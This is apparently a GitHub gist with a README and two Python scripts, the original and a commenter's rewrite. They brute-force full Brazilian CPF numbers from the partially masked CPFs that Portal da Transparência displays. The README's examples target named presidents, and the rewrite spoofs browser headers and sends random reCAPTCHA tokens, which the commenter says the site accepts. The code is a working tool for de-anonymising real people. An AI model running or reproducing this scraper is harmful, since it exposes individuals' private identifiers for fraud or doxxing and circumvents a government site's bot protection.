@pedrogarciafreitas
Last active August 21, 2025 22:22
Script to discover the whole CPF from portaldatransparencia.gov.br

BRUTE FORCE CPF FINDER

The CPF (Cadastro de Pessoas Físicas) is an identification document used in Brazil. It is a unique and individual number assigned to each Brazilian citizen. It is used for identification in various situations, such as opening bank accounts, making purchases, contracting services, among others. To obtain a CPF, it is necessary to register with the Federal Revenue Service.

This script uses one of the main services of the Brazilian federal government to discover information based on the registered citizen's name. It relies on the vulnerability of the Portal da Transparência, which exposes part of the citizen's CPF and censors only the first 3 digits and the verification digits. Since the CPF follows a restricted pattern of digits, by exposing 6 out of a total of 11 digits, the Transparency Portal reduces the number of combinations to 100,000. However, since the CPF uses the last 2 digits for verification of the previous 9, it is possible to reduce the space of possibilities to only 1,000 combinations, which is quite feasible for a brute force attack.

Meaning of the CPF Digits

The CPF consists of 11 digits and has a specific meaning for each one of them. A common representation of the CPF consists of grouping the first nine digits into three groups of three digits separated by a period, followed by a hyphen and the last two digits. Thus, the CPF number ABCDEFGHIJK is formatted as ABC.DEF.GHI-JK. In this case, the digits represented by J and K are used as verification digits.

Each digit of the CPF has a specific meaning. The first eight digits, ABCDEFGH, form the base number defined by the Federal Revenue Service at the time of registration. The ninth digit, I, defines the region where the CPF was issued. The tenth digit is the first verification digit. The eleventh digit is the second verification digit.
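The digit layout described above can be illustrated with a small helper. This is only a sketch: the names `CPFParts`, `split_cpf`, and `format_cpf` are hypothetical and introduced here for illustration, and the sample number is the synthetic sequence 123.456.789-09.

```python
import re
from typing import NamedTuple


class CPFParts(NamedTuple):
    base: str          # digits A to H, the base number
    region: str        # digit I, the issuing region
    verification: str  # digits J and K, the verification digits


def split_cpf(cpf: str) -> CPFParts:
    """Split a CPF, with or without punctuation, into its three parts."""
    digits = re.sub(r"\D", "", cpf)  # drop '.', '-' and any other non-digit
    if len(digits) != 11:
        raise ValueError("a CPF must contain exactly 11 digits")
    return CPFParts(digits[:8], digits[8], digits[9:])


def format_cpf(digits: str) -> str:
    """Format 11 digits as ABC.DEF.GHI-JK."""
    return f"{digits[:3]}.{digits[3:6]}.{digits[6:9]}-{digits[9:]}"


parts = split_cpf("123.456.789-09")
print(parts.base, parts.region, parts.verification)
print(format_cpf("12345678909"))
```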

How Verification Digits Work

The two verification digits are computed in sequence: J from the first nine digits, and K from the nine digits that precede it (the second through ninth digits, followed by J). To obtain J, multiply the first nine digits by the weights {10, 9, 8, 7, 6, 5, 4, 3, 2} (the first by 10, the second by 9, and so on), add the products, and take the remainder R of the sum divided by 11. If R is 0 or 1, then J=0; otherwise, J=11-R.

The second verification digit, K, follows the same rule, with the weights {10, 9, 8, 7, 6, 5, 4, 3, 2} now applied starting from the second digit, so that J is the last digit multiplied. If S is the remainder of the division by 11 of the sum of the products, then K=0 if S is 0 or 1; otherwise, K=11-S. This is equivalent to the more common formulation that weights all ten digits A through J by {11, 10, ..., 2}, because the extra term 11×A leaves no remainder when divided by 11.
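The rule for J and K can be sketched in Python as follows. This is a minimal illustration rather than the script's own implementation: the names `check_digit`, `verification_digits`, and `has_valid_check_digits` are hypothetical, and the sample bases are synthetic sequences. The rejection of repeated-digit numbers is a common convention assumed here, not something stated in the text above.

```python
WEIGHTS = (10, 9, 8, 7, 6, 5, 4, 3, 2)


def check_digit(nine_digits):
    """Weight nine digits by 10..2 and map the remainder mod 11 to a digit."""
    remainder = sum(d * w for d, w in zip(nine_digits, WEIGHTS)) % 11
    return 0 if remainder < 2 else 11 - remainder


def verification_digits(base):
    """Return (J, K) for a nine-digit base given as a string of digits."""
    digits = [int(c) for c in base]
    if len(digits) != 9:
        raise ValueError("base must contain exactly nine digits")
    j = check_digit(digits)
    # K uses the second through ninth digits followed by J.
    k = check_digit(digits[1:] + [j])
    return j, k


def has_valid_check_digits(cpf):
    """Check an 11-digit CPF, ignoring punctuation such as '.' and '-'."""
    digits = "".join(c for c in cpf if c.isdigit())
    if len(digits) != 11 or len(set(digits)) == 1:
        # Assumption: repeated-digit sequences such as 111.111.111-11
        # satisfy the arithmetic but are conventionally rejected.
        return False
    j, k = verification_digits(digits[:9])
    return digits[9:] == f"{j}{k}"


print(verification_digits("123456789"))  # (0, 9)
```

For the base 123456789, the weighted sum is 210 and R=1, so J=0; the second pass gives S=2, so K=9.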

How the Script Works

This script has 2 command-line parameters: --name (mandatory) and --keyword. The --name parameter should contain the full name of the citizen whose CPF you want to discover. If this full name is unique in the database, the script will handle downloading and parsing the partial CPF provided by the Portal da Transparência. Based on this partial CPF, the script generates all possible combinations, finds those valid according to the CPF validation algorithm described above, and then attempts, through brute force, to make a series of requests based on this generated and validated CPF. If the CPF exists in the database, the script notifies. The program stops when the found full name matches the name passed via the --name parameter.

For example, suppose you want to find the CPF of the president of Brazil, Mr. Luiz Inácio Lula da Silva:

python script.py  --name "LUIZ INACIO LULA DA SILVA"

After many attempts, the script reports every CPF it finds in the Portal da Transparência and stops when a discovered CPF corresponds to the name passed through --name.

Parameter --keyword: when the full name of the citizen whose CPF you want to discover is unique in the database, the above command is sufficient. However, in some cases there may be identical or very similar names. In these cases, it is possible to pass the pattern of the partial CPF provided by the Portal da Transparência itself (e.g., ***.680.938-**). You should then provide both the full name (the --name parameter) and the --keyword parameter. The --keyword parameter is used as the search criterion, and the --name parameter as the stop criterion.

For instance, suppose you want to discover the complete CPF of the former president of Brazil, Ms. Dilma Vana Rousseff, knowing that part of her CPF is ***.267.246-**, as provided by the Portal da Transparência:

python script.py  --name "DILMA VANA ROUSSEFF" --keyword "***.267.246-**"

An example run of this script is shown in the video: https://youtu.be/c13g8o0wMJs.

import argparse
import re
import copy
from itertools import product
from dataclasses import dataclass
from absl import app
from absl.flags import argparse_flags
from fake_headers import Headers
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver import ChromeOptions
from selenium.common.exceptions import TimeoutException
from tqdm import tqdm
@dataclass
class Person:
name: str
CPF: str
status: str
def __init__(self, name, cpf, status):
self.name = name
self.CPF = cpf
self.status = status
def extract_single_person_pattern_match(match):
name = match.group('name').strip()
cpf = match.group('cpf')
status = match.group('status').strip()
person = Person(name, cpf, status)
return person
def extract_person_info(text):
# Define regex patterns to extract name, CPF, and status
name_pattern = r'(?P<name>[A-Z\s]+)\n'
cpf_pattern = r'CPF (?P<cpf>\*{3}\.\d{3}\.\d{3}-\*\*)\n'
status_pattern = r'(?P<status>.+?)(?=\n[A-Z]|$)'
pattern = name_pattern + cpf_pattern + status_pattern
matches = re.finditer(pattern, text)
person_info_list = [extract_single_person_pattern_match(match)
for match in matches]
return person_info_list
def is_valid_cpf(cpf):
cpf = [int(char) for char in cpf if char.isdigit()]
if len(cpf) != 11:
return False
if cpf == cpf[::-1]:
return False
# Validate the two verification digits
for i in range(9, 11):
value = sum((cpf[num] * ((i+1) - num) for num in range(0, i)))
digit = ((value * 10) % 11) % 10
if digit != cpf[i]:
return False
return True
def extract_cpf_parts(cpf):
# Regular expression pattern to extract CPF parts
pattern = r'(\*\*\*).(\d{3}).(\d{3})-(\*\*)'
match = re.match(pattern, cpf)
if match:
first_part = match.group(1)
second_part = match.group(2)
third_part = match.group(3)
last_part = match.group(4)
return first_part, second_part, third_part, last_part
else:
return None
def get_combinations():
triplets = [''.join(map(str, c)) for c in product(range(10), repeat=3)]
tuples = [''.join(map(str, c)) for c in product(range(10), repeat=2)]
combinations = product(triplets, tuples)
return combinations
def get_all_cpfs_by_bruteforce(second_part, third_part):
all_combinations = get_combinations()
all_cpfs = []
for first_part, validation_digit in all_combinations:
parts = (first_part, second_part, third_part, validation_digit)
generated_cpf = "".join(parts)
all_cpfs.append(generated_cpf)
return all_cpfs
def get_all_valid_cpfs(second_part, third_part):
all_cpfs = get_all_cpfs_by_bruteforce(second_part, third_part)
valid_cpfs = [c for c in all_cpfs if is_valid_cpf(c)]
return valid_cpfs
class CPFFinder:
url = "https://portaldatransparencia.gov.br/pessoa-fisica/busca/lista?"
def __init__(self, name: str, keyword: str):
self.name = name
self.keyword = keyword
self.url = CPFFinder.url
self._start_crawler()
def _start_crawler(self):
header = Headers(browser="chrome", os="win", headers=False)
customUserAgent = header.generate()['User-Agent']
options = ChromeOptions()
options.add_argument('--headless')
options.add_argument("--enable-javascript")
options.add_argument(f"user-agent={customUserAgent}")
self.driver = webdriver.Chrome(options=options)
def _get_remote_info(self, keyword: str, wait_seconds: int = 5):
driver = copy.copy(self.driver)
driver.get(self.url)
input_field = driver.find_element(By.ID, "termo")
button = driver.find_element(By.ID, "btnBuscar")
input_field.send_keys(f"\"{keyword}\"")
input_field.send_keys(Keys.ENTER)
button.click()
try:
wait = WebDriverWait(driver, wait_seconds)
dynamic_content = wait.until(
EC.visibility_of_element_located((By.ID, "resultados")))
results = extract_person_info(dynamic_content.text)
return results
except TimeoutException:
return self._get_remote_info(keyword, wait_seconds + 10)
def _try_single_cpf(self, cpf):
results = self._get_remote_info(cpf)
if len(results) == 1:
found_person = Person(results[0].name, cpf, results[0].status)
print(f"{found_person} exists in DB.")
if self.name.lower() == found_person.name.lower():
return found_person
return None
def _try_cpfs_by_bruteforce(self, incomplete_cpf):
_, second_part, third_part, _ = extract_cpf_parts(incomplete_cpf)
valid_cpfs = get_all_valid_cpfs(second_part, third_part)
for cpf in (pbar := tqdm(valid_cpfs)):
pbar.set_description(f"Trying CPF {cpf}")
result = self._try_single_cpf(cpf)
if result:
return result
return None
def run(self):
if self.keyword is None:
results = self._get_remote_info(self.name)
if len(results) != 1:
msg = "Many results with this pattern."
msg += "Try a more specific one."
print(msg)
else:
incomplete_cpf = results[0].CPF
else:
incomplete_cpf = self.keyword
print(f"Partial CPF: {incomplete_cpf}")
matched_person = self._try_cpfs_by_bruteforce(incomplete_cpf)
if matched_person:
print(f"Found -> {matched_person}")
def parse_args(argv):
parser = argparse_flags.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
'--name',
type=str,
help='Full name of the person whose CPF is to be discovered',
)
parser.add_argument(
'--keyword',
type=str,
help='Partial CPF of the person',
default=None
)
return parser.parse_args(argv[1:])
def main(args):
CPFFinder(args.name, args.keyword).run()
if __name__ == "__main__":
app.run(main, flags_parser=parse_args)
@fell-lucas
Thanks, your script was a great starting point. I've made some changes to reduce the installation complexity: No dependencies, only libraries from Python standard lib.

It works (for now) because we don't really need to pass reCaptcha, the website accepts any randomly generated token.

python3 cpf.py --help
usage: cpf.py [-h] --name NAME --keyword KEYWORD [--check-portal] [--similarity-threshold SIMILARITY_THRESHOLD] [--debug]

import argparse
import re
import time
import urllib.request
import urllib.parse
import gzip
import json
import http.cookiejar
from itertools import product
from difflib import SequenceMatcher

def is_valid_cpf(cpf):
    cpf = [int(char) for char in cpf if char.isdigit()]

    if len(cpf) != 11:
        return False

    if cpf == cpf[::-1]:
        return False

    # Validate the two verification digits
    for i in range(9, 11):
        value = sum((cpf[num] * ((i+1) - num) for num in range(0, i)))
        digit = ((value * 10) % 11) % 10
        if digit != cpf[i]:
            return False
    return True


def extract_cpf_parts(cpf_pattern):
    """
    Extract known digits from CPF pattern like '***.228.988-**'
    Returns tuple of (known_positions, known_digits)
    """
    # Remove dots and dashes for easier processing
    clean_pattern = cpf_pattern.replace('.', '').replace('-', '')

    known_positions = []
    known_digits = []

    for i, char in enumerate(clean_pattern):
        if char.isdigit():
            known_positions.append(i)
            known_digits.append(int(char))

    return known_positions, known_digits


def generate_cpf_candidates(cpf_pattern):
    """
    Generate all possible CPF candidates based on the pattern.
    Pattern example: '***.228.988-**'
    """
    known_positions, known_digits = extract_cpf_parts(cpf_pattern)

    # Generate all possible 11-digit combinations
    candidates = []

    # We need to fill 11 positions total
    unknown_positions = [i for i in range(11) if i not in known_positions]

    # Generate all combinations for unknown positions
    for unknown_combo in product(range(10), repeat=len(unknown_positions)):
        cpf_digits = [0] * 11

        # Fill known positions
        for pos, digit in zip(known_positions, known_digits):
            cpf_digits[pos] = digit

        # Fill unknown positions
        for pos, digit in zip(unknown_positions, unknown_combo):
            cpf_digits[pos] = digit

        # Convert to string
        cpf_str = ''.join(map(str, cpf_digits))
        candidates.append(cpf_str)

    return candidates


def get_valid_cpfs_from_pattern(cpf_pattern):
    """
    Generate all valid CPFs that match the given pattern.
    """
    candidates = generate_cpf_candidates(cpf_pattern)
    valid_cpfs = [cpf for cpf in candidates if is_valid_cpf(cpf)]
    return valid_cpfs


def format_cpf(cpf_str):
    """Format CPF string with dots and dash: 12345678901 -> 123.456.789-01"""
    return f"{cpf_str[:3]}.{cpf_str[3:6]}.{cpf_str[6:9]}-{cpf_str[9:11]}"


def normalize_name(name):
    """Normalize name for comparison by removing accents, extra spaces, and converting to lowercase"""
    import unicodedata
    # Remove accents
    name = unicodedata.normalize('NFD', name)
    name = ''.join(char for char in name if unicodedata.category(char) != 'Mn')
    # Convert to lowercase and remove extra spaces
    return ' '.join(name.lower().split())


def calculate_name_similarity(name1, name2):
    """Calculate similarity between two names using SequenceMatcher"""
    name1_norm = normalize_name(name1)
    name2_norm = normalize_name(name2)
    return SequenceMatcher(None, name1_norm, name2_norm).ratio()


class PortalSession:
    """Manages session and tokens for Portal da Transparência requests"""

    def __init__(self, debug=False):
        self.cookie_jar = http.cookiejar.CookieJar()
        self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookie_jar))
        self.session_token = None
        self.recaptcha_token = None
        self._debug = debug

    def get_tokens_from_page(self, cpf_formatted):
        """Extract tokens from the main search page"""
        url = f"https://portaldatransparencia.gov.br/pessoa-fisica/busca/lista?termo={urllib.parse.quote(cpf_formatted)}&pagina=1&tamanhoPagina=10"

        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.9',
            'Accept-Encoding': 'gzip, deflate, br',
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1',
            'Sec-Fetch-Dest': 'document',
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-Site': 'none',
            'Cache-Control': 'no-cache',
            'Pragma': 'no-cache',
        }

        req = urllib.request.Request(url, headers=headers)

        try:
            with self.opener.open(req, timeout=15) as response:
                raw_content = response.read()

                # Handle gzipped content
                if response.headers.get('Content-Encoding') == 'gzip':
                    content = gzip.decompress(raw_content).decode('utf-8')
                else:
                    content = raw_content.decode('utf-8')

                # Extract tokens from the page
                # Look for the 't' parameter (session token) in the JavaScript
                t_match = re.search(r"let token = ['\"]&t=([^'\"]+)['\"]", content)
                if t_match:
                    self.session_token = t_match.group(1)

                # Look for recaptcha site key to generate token later
                recaptcha_key_match = re.search(r"grecaptcha\.execute\(['\"]([^'\"]+)['\"]", content)
                if recaptcha_key_match:
                    # For now, we'll skip the recaptcha token since it requires JavaScript execution
                    # The portal might work without it or with a dummy token
                    pass

                # Debug: save content to see what we're getting
                if hasattr(self, '_debug') and self._debug:
                    with open('/tmp/portal_content.html', 'w') as f:
                        f.write(content)
                    print(f"    Debug: Saved page content to /tmp/portal_content.html")

                return True

        except Exception as e:
            print(f"Error getting tokens: {e}")
            return False


def check_cpf_in_portal(cpf_formatted, target_name, similarity_threshold=0.8, debug=False):
    """
    Check if CPF exists in Portal da Transparência using the AJAX endpoint
    Returns tuple: (found, matched_name, similarity_score)
    """
    session = PortalSession(debug)

    try:
        # First, get the tokens from the main page
        if not session.get_tokens_from_page(cpf_formatted):
            if debug:
                print(f"    Debug: Failed to get tokens for {cpf_formatted}")
            return False, None, 0

        # Build the AJAX request URL
        params = {
            'termo': cpf_formatted,
            'pagina': '1',
            'tamanhoPagina': '10'
        }

        if session.session_token:
            params['t'] = session.session_token

        # Try with a dummy recaptcha token if we don't have a real one
        if session.recaptcha_token:
            params['tokenRecaptcha'] = session.recaptcha_token
        else:
            # Generate a dummy recaptcha token (this might not work, but worth trying)
            import random
            import string
            dummy_token = ''.join(random.choices(string.ascii_letters + string.digits + '_-', k=200))
            params['tokenRecaptcha'] = dummy_token

        url = f"https://portaldatransparencia.gov.br/pessoa-fisica/busca/resultado?{urllib.parse.urlencode(params)}"

        if debug:
            print(f"    Debug: Making request to {url}")
            print(f"    Debug: Session token: {session.session_token[:20] + '...' if session.session_token else 'None'}")
            print(f"    Debug: Recaptcha token: {session.recaptcha_token[:20] + '...' if session.recaptcha_token else 'None'}")

        # Headers for the AJAX request
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.9',
            'Accept-Encoding': 'gzip, deflate, br',
            'X-Requested-With': 'XMLHttpRequest',
            'Referer': f'https://portaldatransparencia.gov.br/pessoa-fisica/busca/lista?termo={urllib.parse.quote(cpf_formatted)}&pagina=1&tamanhoPagina=10',
            'Sec-Fetch-Dest': 'empty',
            'Sec-Fetch-Mode': 'cors',
            'Sec-Fetch-Site': 'same-origin',
            'Cache-Control': 'no-cache',
            'Pragma': 'no-cache',
        }

        req = urllib.request.Request(url, headers=headers)

        with session.opener.open(req, timeout=15) as response:
            raw_content = response.read()

            # Handle gzipped content
            if response.headers.get('Content-Encoding') == 'gzip':
                content = gzip.decompress(raw_content).decode('utf-8')
            else:
                content = raw_content.decode('utf-8')

            if debug:
                print(f"    Debug: Response length: {len(content)} characters")
                print(f"    Debug: Response preview: {content[:200]}...")
                with open('/tmp/portal_response.html', 'w') as f:
                    f.write(content)
                print(f"    Debug: Saved response to /tmp/portal_response.html")

            # Try to parse as JSON first
            try:
                data = json.loads(content)
                found_names = []

                # Extract names from JSON response
                if isinstance(data, dict):
                    # Handle the Portal da Transparência response format
                    if 'registros' in data and isinstance(data['registros'], list):
                        for item in data['registros']:
                            if isinstance(item, dict):
                                # Look for name fields in various possible keys
                                for key in ['nome', 'nomeCompleto', 'nomePessoa', 'pessoa']:
                                    if key in item and isinstance(item[key], str):
                                        found_names.append(item[key])
                                        break
                    # Look for other common JSON structures
                    elif 'data' in data and isinstance(data['data'], list):
                        for item in data['data']:
                            if isinstance(item, dict) and 'nome' in item:
                                found_names.append(item['nome'])
                    elif 'resultados' in data and isinstance(data['resultados'], list):
                        for item in data['resultados']:
                            if isinstance(item, dict) and 'nome' in item:
                                found_names.append(item['nome'])
                    # Look for any field that might contain a name
                    else:
                        for key, value in data.items():
                            if 'nome' in key.lower() and isinstance(value, str) and len(value) > 5:
                                found_names.append(value)

            except json.JSONDecodeError:
                # If not JSON, fall back to HTML parsing
                found_names = []
                name_patterns = [
                    r'<strong[^>]*>([^<]+)</strong>',
                    r'class="[^"]*nome[^"]*"[^>]*>([^<]+)<',
                    r'<td[^>]*>([A-ZÁÀÂÃÉÊÍÓÔÕÚÇ][A-ZÁÀÂÃÉÊÍÓÔÕÚÇa-záàâãéêíóôõúç\s]+)</td>',
                    r'"nome":\s*"([^"]+)"',
                ]

                for pattern in name_patterns:
                    matches = re.findall(pattern, content, re.IGNORECASE)
                    for match in matches:
                        name = match.strip()
                        if len(name) > 5 and not re.match(r'^[\d\s\-\.]+$', name):
                            found_names.append(name)

            # Check if any found name matches the target name
            best_match = None
            best_similarity = 0

            for found_name in found_names:
                similarity = calculate_name_similarity(target_name, found_name)
                if similarity > best_similarity:
                    best_similarity = similarity
                    best_match = found_name

            if best_match and best_similarity >= similarity_threshold:
                return True, best_match, best_similarity
            elif found_names:
                return True, found_names[0] if found_names else None, best_similarity
            else:
                return False, None, 0

    except Exception as e:
        print(f"Error checking CPF {cpf_formatted}: {e}")
        return False, None, 0


class CPFBruteForcer:
    def __init__(self, name: str, keyword: str, check_portal: bool = False, similarity_threshold: float = 0.8, debug: bool = False):
        self.name = name
        self.keyword = keyword
        self.check_portal = check_portal
        self.similarity_threshold = similarity_threshold
        self.debug = debug

    def run(self):
        if not self.keyword:
            print("Error: --keyword argument is required for brute force mode")
            print("Example: python3 cpf.py --name 'DILMA VANA ROUSSEFF' --keyword '***.267.246-**'")
            return

        print(f"Name: {self.name}")
        print(f"CPF Pattern: {self.keyword}")
        print(f"Portal Check: {'Enabled' if self.check_portal else 'Disabled'}")
        if self.check_portal:
            print(f"Name Similarity Threshold: {self.similarity_threshold}")
        print("Generating valid CPFs that match the pattern...")

        try:
            valid_cpfs = get_valid_cpfs_from_pattern(self.keyword)

            if not valid_cpfs:
                print("No valid CPFs found matching the pattern.")
                return

            print(f"\nFound {len(valid_cpfs)} valid CPF(s) matching the pattern.")

            if self.check_portal:
                print("Checking each CPF against Portal da Transparência...")
                print("-" * 70)

                matches_found = 0
                for i, cpf in enumerate(valid_cpfs, 1):
                    formatted_cpf = format_cpf(cpf)
                    print(f"[{i}/{len(valid_cpfs)}] Checking CPF: {formatted_cpf}", end=" ... ")

                    found, matched_name, similarity = check_cpf_in_portal(formatted_cpf, self.name, self.similarity_threshold, self.debug)

                    if found and similarity >= self.similarity_threshold:
                        print(f"✓ MATCH FOUND!")
                        print(f"    Found Name: {matched_name}")
                        print(f"    Similarity: {similarity:.2%}")
                        print(f"    Target Name: {self.name}")
                        matches_found += 1
                    elif found:
                        print(f"✗ Found but low similarity ({similarity:.2%})")
                        if matched_name:
                            print(f"    Found Name: {matched_name}")
                    else:
                        print("✗ Not found")

                    # Add delay to avoid overwhelming the server
                    time.sleep(1)

                print("-" * 70)
                print(f"Search completed. Found {matches_found} matching CPF(s).")
            else:
                print("-" * 50)
                for cpf in valid_cpfs:
                    formatted_cpf = format_cpf(cpf)
                    print(f"Valid CPF: {formatted_cpf}")

        except Exception as e:
            print(f"Error processing CPF pattern: {e}")
            print("Make sure the pattern is in the correct format (e.g., '***.228.988-**')")


def parse_args():
    parser = argparse.ArgumentParser(
        description='CPF Brute Force Tool - Generate valid CPFs from partial patterns and optionally check against Portal da Transparência',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )
    parser.add_argument(
        '--name',
        type=str,
        required=True,
        help='Full name of the person to search for'
    )
    parser.add_argument(
        '--keyword',
        type=str,
        required=True,
        help='Partial CPF pattern (e.g., "***.228.988-**")'
    )
    parser.add_argument(
        '--check-portal',
        action='store_true',
        help='Check each generated CPF against Portal da Transparência'
    )
    parser.add_argument(
        '--similarity-threshold',
        type=float,
        default=0.8,
        help='Minimum name similarity threshold (0.0 to 1.0) for considering a match'
    )
    parser.add_argument(
        '--debug',
        action='store_true',
        help='Enable debug output for portal requests'
    )
    return parser.parse_args()


def main():
    args = parse_args()
    brute_forcer = CPFBruteForcer(
        args.name,
        args.keyword,
        args.check_portal,
        args.similarity_threshold,
        args.debug
    )
    brute_forcer.run()


if __name__ == "__main__":
    main()
